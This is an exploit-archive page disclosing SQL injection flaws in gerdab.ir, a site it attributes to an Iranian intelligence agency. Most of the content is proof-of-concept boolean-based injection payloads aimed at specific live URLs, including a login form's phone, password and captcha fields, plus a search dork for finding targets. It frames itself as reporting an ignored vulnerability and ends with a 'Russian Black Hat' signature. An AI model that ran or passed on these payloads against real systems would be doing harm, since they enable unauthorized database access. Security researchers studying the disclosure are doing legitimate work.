what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Gerdab.ir SQL Injection

Gerdab.ir SQL Injection
Posted Nov 25, 2021
Authored by E1.Coders

Gerdab.ir suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 3658342384327aa02440e31087e45925ad4cee576132b6f0e1ebc3447156c002

Gerdab.ir SQL Injection

Change Mirror Download

This site belongs to the Revolutionary Guards Intelligence Organization of the Islamic Republic of Iran (IRGC), which has a security problem with the SQL INJECTION Vulnerability "CWE-89".

We have repeatedly reported to this site that it has a security problem and has ignored our report.
We want to record this security issue




#########################################################################################################################
# #
# Exploit Title : Site affiliated To the intelligence agency Revolutionary Guards of the Islamic Republic of Iran (IRGC) SQL INJECTION Vulnerability #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : www.my.gerdab.ir #
# #
# Security Risk : Medium #
# #
# Description : All target's IRanian Military websites #
# #
# DorK : ""inurl:reports/status?s=" "site:my.gerdab.ir/reports/status?s=" #
# #
#########################################################################################################################
# #
# Expl0iTs: #
#
#
# address (refer url): https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# vulnerabillity : GET SQL INJECT BOOLEAN Based string
#
# action url: https://gerdab.ir/fa/archive?sec_id=63&service_id=99999999

--------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# request type : COOKIE
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9
#
# parameter : service_id
#
# description : COOKIE SQL INJECTION BooleanBased String
#
# POC : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199

---------------------------------------

# vuln type : SQLInjection
#
# refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63
#
# request type : GET
#
# action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9
#
# parameter : service_id
#
# description : GET SQL INJECTION BooleanBased Integer
#
# POC : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end)
#
#
------------------------------------------------------
#
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999
#
# parameter : phone
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999/**/oR/**/8871966=8871966/**/aNd/**/7193=7193
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986
# parameter : phone
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986/**/RLIKE/**/(case/**/when/**//**/7338747=7338747/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
#
# request type : POST
#
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999
#
# parameter : password
#
# description : POST SQL INJECTION BooleanBased String
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999%27/**/oR/**/4563301=4563301/**/aNd/**/%276199%27=%276199
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819
# parameter : password
# description : POST SQL INJECTION BooleanBased Integer
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819/**/RLIKE/**/(case/**/when/**//**/8423820=8423820/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)
#
------------------------------------------------
#
# vuln type : SQLInjection
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999
#
# parameter : captcha
#
# description : POST SQL INJECTION BooleanBased Integer
#
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999/**/oR/**/6019831=6019831--%20
#
------------------------------------------------
#
# vuln type : SQLInjection
#
# refer address : https://my.gerdab.ir/login
# request type : POST
# action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505
# parameter : captcha
# description : POST SQL INJECTION BooleanBased String
# POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505%27/**/RLIKE/**/(case/**/when/**//**/2804470=2804470/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'7917'='7917
------------------------------------------------
# #
# 1: https://my.gerdab.ir/reports/status?s=1' #
# #
# 2: https://my.gerdab.ir/reports/status?s%22=%221%22 #
# #
#########################################################################################################################
# #
# | Security Is JOCK | #
# #
# | Russian Black Hat | #
# #
#########################################################################################################################





--
E1 Coders
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close